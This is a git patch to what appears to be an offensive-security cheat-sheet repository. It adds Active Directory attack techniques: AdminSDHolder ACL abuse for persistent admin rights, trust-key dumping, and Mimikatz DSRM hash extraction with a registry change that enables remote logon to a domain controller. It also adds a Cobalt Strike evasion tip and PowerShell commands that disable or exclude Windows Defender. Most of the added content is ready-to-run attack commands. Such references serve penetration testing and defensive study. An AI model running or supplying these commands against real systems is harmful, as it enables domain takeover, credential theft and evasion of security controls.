From 3a6ac550b857812fd0d36037b698550930958863 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Fri, 8 Jan 2021 23:41:50 +0100 Subject: [PATCH] DSRM Admin --- .github/FUNDING.yml | 2 +- .../Active Directory Attack.md | 43 +++++++++++++++---- .../Cobalt Strike - Cheatsheet.md | 2 + .../Windows - Persistence.md | 6 +++ 4 files changed, 43 insertions(+), 10 deletions(-) diff --git a/.github/FUNDING.yml b/.github/FUNDING.yml index 8b5d40b..7e853ea 100644 --- a/.github/FUNDING.yml +++ b/.github/FUNDING.yml @@ -1,5 +1,5 @@ # These are supported funding model platforms -github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2] +github: swisskyrepo ko_fi: swissky # Replace with a single Ko-fi username custom: https://www.buymeacoffee.com/swissky diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 143ef32..c842f4f 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -70,6 +70,7 @@ - [Relay delegation with mitm6](#relay-delegation-with-mitm6) - [PrivExchange attack](#privexchange-attack) - [PXE Boot image attack](#pxe-boot-image-attack) + - [DSRM Credentials](#dsrm-credentials) - [Impersonating Office 365 Users on Azure AD Connect](#impersonating-office-365-users-on-azure-ad-connect) - [Linux Active Directory](#linux-active-directory) - [CCACHE ticket reuse from /tmp](#ccache-ticket-reuse-from-tmp) @@ -1451,11 +1452,7 @@ Find users with `AdminCount=1`. ```powershell python ldapdomaindump.py -u example.com\john -p pass123 -d ';' 10.100.20.1 jq -r '.[].attributes | select(.adminCount == [1]) | .sAMAccountName[]' domain_users.json -``` - -AdminSDHolder - -```powershell +or Get-ADUser -LDAPFilter "(objectcategory=person)(samaccountname=*)(admincount=1)" Get-ADGroup -LDAPFilter "(objectcategory=group) (admincount=1)" or @@ -1464,13 +1461,21 @@ or #### AdminSDHolder Abuse -If you modify the permissions of **AdminSDHolder**, that permission template will be pushed out to all protected accounts automatically by SDProp. +> The Access Control List (ACL) of the AdminSDHolder object is used as a template to copy permissions to all "protected groups" in Active Directory and their members. Protected groups include privileged groups such as Domain Admins, Administrators, Enterprise Admins, and Schema Admins. + +If you modify the permissions of **AdminSDHolder**, that permission template will be pushed out to all protected accounts automatically by SDProp (in an hour). +E.g: if someone tries to delete this user from the Domain Admins in an hour or less, the user will be back in the group. ```powershell -# right to reset password for toto using the account titi +# Add a user to the AdminSDHolder group: +Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All + +# Right to reset password for toto using the account titi Add-ObjectACL -TargetSamAccountName toto -PrincipalSamAccountName titi -Rights ResetPassword -# give all rights + +# Give all rights Add-ObjectAcl -TargetADSprefix 'CN=AdminSDHolder,CN=System' -PrincipalSamAccountName toto -Verbose -Rights All +Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=testlab,DC=local' -PrincipalIdentity matt -Rights All ``` @@ -1660,12 +1665,14 @@ Prerequisite: ### Forest to Forest Compromise - Trust Ticket +* Require: SID filtering disabled + From the DC, dump the hash of the `currentdomain\targetdomain$` trust account using Mimikatz (e.g. with LSADump or DCSync). Then, using this trust key and the domain SIDs, forge an inter-realm TGT using Mimikatz, adding the SID for the target domain's enterprise admins group to our **SID history**. #### Dumping trust passwords (trust keys) -> Look for the trust name with a dollar ($) sign at the end. Most of the accounts with a trailing “$” are computer accounts, but some are trust accounts. +> Look for the trust name with a dollar ($) sign at the end. Most of the accounts with a trailing **$** are computer accounts, but some are trust accounts. ```powershell lsadump::trust /patch @@ -2054,6 +2061,24 @@ PXE allows a workstation to boot from the network by retrieving an operating sys >>>> >>>> UserPassword = Somepass1 ``` +### DSRM Credentials + +> Directory Services Restore Mode (DSRM) is a safe mode boot option for Windows Server domain controllers. DSRM allows an administrator to repair or recover to repair or restore an Active Directory database. + +This is the local administrator account inside each DC. Having admin privileges in this machine, you can use mimikatz to dump the local Administrator hash. Then, modifying a registry to activate this password so you can remotely access to this local Administrator user. + +```ps1 +Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' + +# Check if the key exists and get the value +Get-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior + +# Create key with value "2" if it doesn't exist +New-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 -PropertyType DWORD + +# Change value to "2" +Set-ItemProperty "HKLM:\SYSTEM\CURRENTCONTROLSET\CONTROL\LSA" -name DsrmAdminLogonBehavior -value 2 +``` ### Impersonating Office 365 Users on Azure AD Connect diff --git a/Methodology and Resources/Cobalt Strike - Cheatsheet.md b/Methodology and Resources/Cobalt Strike - Cheatsheet.md index f708f6b..e053adf 100644 --- a/Methodology and Resources/Cobalt Strike - Cheatsheet.md +++ b/Methodology and Resources/Cobalt Strike - Cheatsheet.md @@ -313,6 +313,8 @@ beacon > execute-assembly /home/audit/Rubeus.exe ## Lateral Movement +:warning: OPSEC Advice: Use the **spawnto** command to change the process Beacon will launch for its post-exploitation jobs. The default is rundll32.exe + - **portscan:** Performs a portscan on a spesific target. - **runas:** A wrapper of runas.exe, using credentials you can run a command as another user. - **pth:** By providing a username and a NTLM hash you can perform a Pass The Hash attack and inject a TGT on the current process. \ diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md index 743ca6f..820312e 100644 --- a/Methodology and Resources/Windows - Persistence.md +++ b/Methodology and Resources/Windows - Persistence.md @@ -37,9 +37,15 @@ ## Disable Windows Defender ```powershell +# Disable Defender sc config WinDefend start= disabled sc stop WinDefend Set-MpPreference -DisableRealtimeMonitoring $true + +## Exclude a process / location +Set-MpPreference -ExclusionProcess "word.exe", "vmwp.exe" +Add-MpPreference -ExclusionProcess 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' +Add-MpPreference -ExclusionPath C:\Video, C:\install ``` ## Disable Windows Firewall